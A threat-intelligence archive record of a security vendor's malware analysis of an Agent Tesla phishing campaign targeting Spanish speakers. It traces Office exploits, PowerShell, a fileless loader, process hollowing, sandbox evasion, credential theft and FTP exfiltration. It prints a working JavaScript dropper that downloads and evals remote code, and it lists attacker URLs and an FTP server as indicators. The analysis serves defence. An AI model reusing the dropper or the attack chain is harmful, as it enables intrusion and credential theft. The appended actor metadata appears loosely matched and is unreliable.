{ "id": "14f90200-db22-4e56-95fe-cb90c41a6e40", "created_at": "2026-04-06T03:36:13.441949Z", "updated_at": "2026-04-10T03:37:09.171696Z", "deleted_at": null, "sha1_hash": "8d05480fff0d069e0a873a92eabc9761b83dd8fb", "title": "New Agent Tesla Campaign Targeting Spanish-Speaking People | FortiGuard Labs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2826830, "plain_text": "New Agent Tesla Campaign Targeting Spanish-Speaking People |\r\nFortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2024-06-07 · Archived: 2026-04-06 03:09:00 UTC\r\nAffected Platforms: Microsoft Windows\r\nImpacted Users: Windows Users\r\nImpact: Collects sensitive information from a victim’s computer\r\nSeverity Level: Critical\r\nA new phishing campaign was recently captured by our FortiGuard Labs that spreads a new Agent Tesla variant\r\ntargeting Spanish-speaking people.\r\nSecurity researchers have detected Agent Tesla campaigns from time to time for years. Agent Tesla is a well-known .Net-based Remote Access Trojan (RAT) designed to stealthily infiltrate victim’s computers and steal their\r\nsensitive information, such as their computer’s hardware information, login user information, keystrokes, email\r\ncontacts, web browser cookies files, system clipboard data, screenshots, and basic information like login user\r\nname, computer name, OS information, CPU and RAM information, as well as saved credentials in widely\r\ninstalled software.\r\nIn-depth research on this campaign shows that it also leverages multiple techniques to deliver the Agent Tesla core\r\nmodule, such as using known MS Office vulnerabilities, JavaScript code, PowerShell code, fileless modules, and\r\nmore, to protect itself from being analyzed by security researchers.\r\nIn this analysis, I will elaborate on how the campaign works to load Agent Tesla onto a victim’s computer, how it\r\nstarts, what sensitive data it is able to collect, and the way it sends stolen data to the attacker.\r\nThe Phishing Email\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 1 of 15\n\nFigure 1 – The phishing email.\r\nAs you can see from the above screenshot, the phishing email was written in Spanish. The message translated into\r\nEnglish reads as:\r\nGood day\r\nAttached is proof of payment made to your account according to your client's instructions.\r\nThe phishing email looks like a standard SWIFT transfer notification from a large financial institution with a\r\ndisguised Excel attachment (transferencia_swift_87647574684.xla) to the victim, as shown in Figure 1.\r\nAs you may have noticed, the FortiClient service marked the phishing email with “[virus detected]” to warn the\r\nuser about the attached Excel document.\r\nThe Excel Document\r\nThe Excel document is in OLE format with crafted embedded data that exploits the CVE-2017-0199 vulnerability.\r\nIt contains an embedded OLE hyperlink, which is opened automatically once the Excel document is started by the\r\nvictim. The provided hyperlink in the document is “hxxp[:]//ilang[.]in/QqBbmc”, as shown in Figure 2.\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 2 of 15\n\nFigure 2 – Embedded OLE hyperlink to an online RTF document.\r\nOnce the victim opens the Excel file, it automatically downloads an RTF document, which the Word program then\r\ncalls to open. Figure 3 shows the traffic and how the URL downloads the RTF document.\r\nFigure 3 – The equation content inside the RTF document.\r\nCVE-2017-11882 is Exploited\r\nCVE-2017-11882 is an RCE (Remote Code Execution) vulnerability in Microsoft Office’s Equation Editor\r\ncomponent (EQNED32.EXE). It can be exploited by Excel, Word, PowerPoint, and RTF documents as long as\r\nthey contain crafted equation data in an OLE object. Successfully exploiting this vulnerability allows an attacker\r\nto execute arbitrary code on a victim's computer.\r\nThis buffer overflow vulnerability overrides a return address in the stack of EQNED32.EXE. It can then hijack the\r\nprocess to jump to and execute the malicious code copied in the stack.\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 3 of 15\n\nFigure 4 – Crafted equation data.\r\nFigure 4 shows the crafted equation data extracted from the downloaded RTF document. The data marked in red is\r\na constant address of EQNED32.EXE that will override a return address in the stack when a buffer overflow\r\noccurs.\r\nOnce the shellcode is executed, it downloads a JavaScript code from a website and executes it on the victim’s\r\ncomputer. In Figure 5, the shellcode was about to call an API, URLDownloadToFileW(), to download the\r\nJavaScript file from “hxxp[:]//equalizerrr[.]duckdns.org/eveningdatingforeveryone.js” to the local file\r\n“C:\\Users\\Bobs\\AppData\\Roaming\\morningdatingroses.js.”\r\nFigure 5 – Shellcode to download a JavaScript file to local.\r\nIt then calls the API ShellExecuteW() to execute the JavaScript file (the Windows program WScript.exe is called\r\nto execute the JS file). Finally, it exits the process by calling the API ExitProcess().\r\nJavaScript Files Lead to Execute PowerShell Code\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 4 of 15\n\nBelow is a code snippet of the JavaScript file. It is very clear that it continues to download another file from\r\n“hxxps[:]//paste[.]ee/d/yWWXG.” This JavaScript file is executed after calling the eval() function.\r\nmorningdatingroses.js:\r\nvar paparicos = new ActiveXObject(\"MSXML2.XMLHTTP\");\r\nvar alijar = \"GXWWy/d/ee.etsap//:sptth\".split(\"\").reverse().join(\"\");\r\npaparicos.open(\"GET\", alijar, false);\r\npaparicos.send();\r\nvar vomitar = \"\";\r\nif (paparicos.status === 200) {\r\n    vomitar = paparicos.responseText;\r\n}\r\nfunction estarostia(piguancha) {\r\n    eval(piguancha);\r\n}\r\nestarostia(vomitar);\r\nFigure 6 – Base64 encoded PowerShell code.\r\nWhen opening the URL in a web browser, it looks like normal JavaScript code, but it contains a piece of malicious\r\ncode with base64-encoded PowerShell code. This code will be decoded and combined with other code (shown\r\nbelow) and executed inside a “powershell.exe” process, as you can see in Figure 6.\r\nThe PowerShell code’s purpose includes:\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 5 of 15\n\n1. Downloading a normal jpg file with a base64 encoded .Net module (the loader-module) appended to it. The\r\nURL of the jpg file is a constant string:\r\n“hxxps[:]//uploaddeimagens[.]com[.]br/images/004/773/812/original/js.jpg?1713882778”.\r\n2. Extracting the loader-module from the jpg file, base64 decoding it, and loading it into PowerShell’s\r\nmemory.\r\n3. Calling the loader-module’s VAI() method under the namespace PROJETOAUTOMACAO.VB and the class\r\nHome.\r\nPlease refer to Figure 7 for more information about the PowerShell code.\r\nFigure 7 – The base64 decoded PowerShell code.\r\nThe loader-module is a kind of fileless module that is never saved in the local folder. This makes it difficult for a\r\nresearcher to notice the file unless performing a step-by-step, in-depth analysis.\r\nThe first argument to the method VAI() is a reversed URL to the Agent Tesla core module, which is\r\n“hxxp[:]//equalizerrr[.]duckdns[.]org/droidbase64controlfire.txt.” The second argument is a switch. If it’s “1,” it\r\nwill establish persistence on the victim’s computer by adding itself to the auto-run group in the system’s registry.\r\nIn this case, it’s \"desativado,” so it won’t establish.\r\nThe penultimate argument is a process name, which for this variant is “AddInProcess32.”\r\nA Look into the Loader-Module\r\nThe loader-module running in a PowerShell process downloads a file from the URL passed by the first argument\r\nand keeps it in the memory. This is the Agent Tesla core module, as shown in Figure 8.\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 6 of 15\n\nFigure 8 – Loader-module downloads Agent Tesla executable.\r\nAfterward, it initiates the 'AddInProcess32' process in a suspended state by calling the API CreateProcessA() with\r\nthe creation flags of 0x80000004 (CREATE_SUSPENDED).\r\nNext, the loader-module performs process hollowing on the process that it copies the Agent Tesla executable into\r\nand executes it within the “AddInProcess32.exe” process. To do this, it calls APIs, such as GetThreadContext(),\r\nVirtualAllocEx(), WriteProcessMemory(), SetThreadContext(), and ResumeThread().\r\nFigure 9 shows the process tree outlining the complete picture, starting from the Excel document and ending with\r\nAgent Tesla running inside “AddInProcess32.exe.”\r\nFigure 9 – Process tree of the relevant processes.\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 7 of 15\n\nAgent Tesla Executable Module\r\nThis variant of Agent Tesla is a 32-bit .Net framework program is being obfuscated as a fileless module. Figure 10\r\nshows a debugger that breaks Agent Tesla at the EntryPoint method, where the namespaces, classes, methods, and\r\ncode flow are all obfuscated.\r\nFigure 10 – Obfuscated Agent Tesla executable in a debugger.\r\nA special method aims to detect whether it is running in an analysis environment. It performs the following\r\ndetections:\r\nIt calls the Windows API CheckRemoteDebuggerPresent() to determine if it’s debugged.\r\nAgent Tesla calculates the difference between two tick counts before and after sleeping for ten milliseconds\r\nto detect whether it is being debugged or running in a VM.\r\nIt checks whether some AV or sandbox-related DLLs are loaded in the current process, such as\r\n\"SbieDLL.dll\" for Sandboxie, \"SxIn.dll\" for Qihu 360, \"Sf2.dll\" for Avast, \"snxhk.dll\" for Sophos Intercept\r\nX, and \"cmdvrt32.dll\" for Comodo.\r\nAgent Tesla checks if it’s running in a virtualization environment by executing two WMI queries to retrieve\r\nthe computer’s hardware information, like “Manufacturer,” “Model,” and “Name” of the video controller.\r\nIt then matches some keywords, such as “Microsoft corporation,” “VMware,” “VIRTUAL,” “VirtualBox,”\r\nand “VBox” within the retrieved hardware information.\r\nIt visits the URL “hxxp://ip-api[.]com/line/?fields=hosting” and checks if the response is “true.” This\r\nallows it to check if it’s running in a host provider or a data center.\r\nOnce any of the above detections’ results are ‘true,’ it exits the process.\r\nSensitive Information Stolen from the Victim Device\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 8 of 15\n\nIn this section, I will review Agent Tesla’s features, such as how this variant collects credentials and email\r\ncontacts from the victim’s device, the software from which it collects the data, and the basic information of the\r\nvictim’s device.\r\nIt steals saved credentials from some web browsers, classified as Chromium-based and Mozilla-based, because\r\nthey use the same folder structure and files to save the credentials.\r\nIt reads saved credentials from “Login Data” files under their browsers’ profile folder for Chromium-based\r\nbrowsers. Figure 11 shows that it had just obtained some “Opera Browser” (Chromium-based browser) credentials\r\nfrom its profile files “{browser’s profile path}\\Default\\Login Data” and “{browser’s profile path}\\Login Data.”\r\nFigure 11 – Stolen credentials from Chromium-based browser.\r\nFigure 12 – Stolen credentials from Mozilla-based browser.\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 9 of 15\n\nFigure 12 shows it has just obtained credentials from a Firefox browser’s profile.\r\nThis variant will steal credentials from the following web browser list.\r\nChromium-based Web Browsers\r\n\"Orbitum,\" \"Elements Browser,\" \"Cool Novo,\" \"Sputnik,\" \"360 Browser,\" \"Uran,\" \"Iridium Browser,\" \"Liebao\r\nBrowser,\" \"Vivaldi,\" \"Chromium,\" \"Sleipnir 6,\" \"Coowon,\" \"Coccoc,\" \"Amigo,\" \"Chedot,\" \"Epic Privacy,\"\r\n\"CentBrowser,\" \"Edge Chromium,\" \"Chrome,\" \"Citrio,\" \"Opera Browser,\" \"QIP Surf,\" \"Brave,\" \"Kometa,\"\r\n\"Comodo Dragon,\" \"7Star,\" \"Torch Browser,\" \"Yandex Browser.\"\r\nMozilla-based Web Browsers\r\n\"Firefox, \"CyberFox, \"WaterFox, \"K-Meleon, \"Postbox, \"Thunderbird browser, \"IceCat, \"Flock, \"IceDragon,\r\n\"BlackHawk, \"PaleMoon,\" and \"SeaMonkey.”\r\nOther than the above web browsers, Agent Tesla continues to look for more saved credentials from a wide range\r\nof software, which I have categorized below.\r\nOther Web Browsers:\r\n\"Falkon Browser,\" \"Flock Browser,\" \"IE/Edge,\" \"QQ Browser,\" \"Safari for Windows,\" and \"UC Browser.”\r\nEmail clients:\r\n\"Outlook, \"Opera Mail, \"PocoMail, \"The Bat!\", \"Becky!\", \"ClawsMail, \"FoxMail, \"IncrediMail, \"eM Client,\r\n\"Mailbird, \"Eudora,\" and \"Windows Mail App.\"\r\nFTP clients:\r\n\"CoreFTP,\" \"Flash FXP,\" \"FTPGetter,\" \"FTP Navigator,\"  \"FileZilla,\" \"SmartFTP,\" \"FtpCommander,\" \"WinSCP,\"\r\nand \"WS_FTP.\"            \r\nVPN clients:\r\n\"NordVPN,\" \"TightVNC,\" \"RealVNC,\" \"UltraVNC,\" \"OpenVPN,\" and \"Private Internet Access.\"\r\nIM client:\r\n\"Discord,\" \"Pidgin,\" \"Trillian,\" \"Psi/Psi+,\" and \"Paltalk.\"\r\nOthers:\r\n\"MysqlWorkbench,\" \"DynDns,\" \"Microsoft Credentials,\" \"Internet Downloader Manager,\" and \"JDownloader.”\r\nAgent Tesla can also collect the victim’s email contacts if they use Thunderbird as their email client. Inside global-messages-db.sqlite, under the Thunderbird profile folder, there is a file named global-messages-db.sqlite. It is an\r\nSQLite database that stores an index of all messages, including attachments, BCC and CC emails, folder names,\r\nand more. Agent Tesla extracts all contacts (email addresses) from such files.\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 10 of 15\n\nFigure 13 – Agent Tesla collects contacts from the victim.\r\nBased on my analysis, this variant disabled some features (some switch variables are set to “false” by default.),\r\nsuch as the keylogger, the screen logger, the system clipboard logger, and cookies. Refer to Figure 14 for details. \r\nFigure 14 – Some features are disabled by default.\r\nAgent Tesla also collects information about the victim’s computer, such as the system date and time, login user\r\nname, computer name, public IP address, OS full name, CPU information, and RAM capacity.\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 11 of 15\n\nSubmitting Stolen Data to an FTP Server\r\nIn the past, we captured many Agent Tesla variants that used HTTP POST and SMTP to submit their stolen data to\r\ntheir C2 server. This variant uses a new way to submit the data it collects from the victim’s device over the FTP\r\nprotocol. The FTP server address and its credentials are plaintext strings held in some global variables.\r\nFigure 15 – Submit stolen data via FTP.\r\nFigure 15 is a screenshot of Agent Tesla about to submit s credentials stolen from my test machine using the FTP\r\nmethod “STOR.” The format of the file name on the FTP is in “PW_{User name-Computer name_System\r\nData\u0026Time}.html”; the content is the stolen data in HTML format.\r\nThe collected email contacts are in a txt file named “Contacts_Thunderbird.txt_{User name-Computer\r\nname_System Data\u0026Time}.txt”. One example on my test machine is “Contacts_Thunderbird.txt_Bobs-BOBS-PC_2024_05_17_17_34_21.txt”. The txt file contains all the email addresses collected from Thunderbird.\r\nSummary\r\nIn this analysis, I went through the entire process of the Agent Tesla campaign targeting Spanish-speaking people.\r\nThe flowchart in Figure 16 outlines this complex malicious campaign, detailing the process from the phishing\r\nemail to the stolen information being submitted to an FTP server.\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 12 of 15\n\nFigure 16 – The whole process of this Agent Tesla campaign.\r\nWe also examined how it uses multiple techniques to escape researcher analysis, such as exploiting two Microsoft\r\nvulnerabilities carried by Excel, RTF documents, executing JavaScript and PowerShell scripts, and encoding most\r\ndownloaded files in base64.\r\nNext, we looked at how the fileless loader-module is called to download the Agent Tesla executable and run it in a\r\nprocess-hollowed AddInProcess.exe process.\r\nI then elaborated on how Agent Tesla detects whether it’s running in an analysis environment, like sandboxes,\r\nvirtual machines, etc., or where there is AV software running, like Avast, Comodo, etc.\r\nWe then looked at the functions this variant can perform on the victim’s device. It collects saved credentials from\r\nover 80 popular software applications and victim email contacts from Thunderbird profile files.\r\nFinally, you learned how this Agent Tesla variant submits the sensitive data it has harvested from the victim’s\r\ndevice to an FTP server using the “STOR” method. \r\nFortinet Protections\r\nFortinet customers are already protected from this campaign with FortiGuard’s AntiSPAM, Web Filtering, and\r\nAntiVirus services as follows:\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 13 of 15\n\nThe downloading URLs are rated as “Malicious Websites” by the FortiGuard Web Filtering service.\r\nFortiMail recognizes the phishing email as “virus detected.” In addition, real-time anti-phishing provided by\r\nFortiSandbox embedded in Fortinet’s FortiMail, web filtering, and antivirus solutions provides advanced\r\nprotection against both known and unknown phishing attempts.\r\nFortiGuard Antivirus service detects the attached Excel document, the downloaded RTF document, and the Agent\r\nTesla executable file with the following AV signatures.\r\nMSExcel/CVE_2017_0199.DDOC!exploit\r\nMSOffice/CVE_2017_11882.B!exploit\r\nMSIL/AgentTesla.B!tr\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard\r\nAntiVirus engine is part of each solution. As a result, customers who have these products with up-to-date\r\nprotections are already protected.\r\nThe FortiGuard CDR (content disarm and reconstruction) service can disarm the malicious Equation data inside\r\nthe Excel document.\r\nYou can also view FortiGuard Labs' previously released outbreak alert on Agent Tesla here. To stay informed of\r\nnew and emerging threats, you can sign up to receive future alerts.\r\nWe also suggest our readers go through the free NSE training: NSE 1 – Information Security Awareness, a module\r\non Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact our Global\r\nFortiGuard Incident Response Team. \r\nIOCs\r\nURLs\r\nhxxps[:]//ilang[.]in/QqBbmc\r\nhxxp[:]//equalizerrr[.]duckdns[.]org/eveningdatingforeveryone.js\r\nhxxp[:]//equalizerrr[.]duckdns[.]org/droidbase64controlfire.txt\r\nhxxps[:]//paste[.]ee/d/yWWXG\r\nhxxps[:]//uploaddeimagens[.]com[.]br/images/004/773/812/original/js.jpg?1713882778\r\nFTP Server List\r\nftp[.]fosna.net\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 14 of 15\n\nRelevant Sample SHA-256\r\n[transferencia_swift_87647574684.xla]\r\n8406A1D7A33B3549DD44F551E5A68392F85B5EF9CF8F9F3DB68BD7E02D1EABA7\r\n[RTF document]\r\n208AF8E2754A3E55A64796B29EF3A625D89A357C59C43D0FF4D2D30E20092D74\r\n[The loader-module]\r\n7230CC614270DCA79415B0CF53A666A219BEB4BEED90C85A1AC09F082AEA613B\r\n[Agent Tesla Executable]\r\nA1475A0042FE86E50531BB8B8182F9E27A3A61F204700F42FD26406C3BDEC862\r\nSource: https://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nhttps://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people\r\nPage 15 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://www.fortinet.com/blog/threat-research/new-agent-tesla-campaign-targeting-spanish-speaking-people" ], "report_names": [ "new-agent-tesla-campaign-targeting-spanish-speaking-people" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "0661a292-80f3-420b-9951-a50e03c831c0", "created_at": "2023-01-06T13:46:38.928796Z", "updated_at": "2026-04-10T02:00:03.148052Z", "deleted_at": null, "main_name": "IRIDIUM", "aliases": [], "source_name": "MISPGALAXY:IRIDIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "75455540-2f6e-467c-9225-8fe670e50c47", "created_at": "2022-10-25T16:07:23.740266Z", "updated_at": "2026-04-10T02:00:04.732992Z", "deleted_at": null, "main_name": "Iridium", "aliases": [], "source_name": "ETDA:Iridium", "tools": [ "CHINACHOPPER", "China Chopper", "LazyCat", "Powerkatz", "SinoChopper", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775446573, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/8d05480fff0d069e0a873a92eabc9761b83dd8fb.pdf", "text": "https://archive.orkl.eu/8d05480fff0d069e0a873a92eabc9761b83dd8fb.txt", "img": "https://archive.orkl.eu/8d05480fff0d069e0a873a92eabc9761b83dd8fb.jpg" } }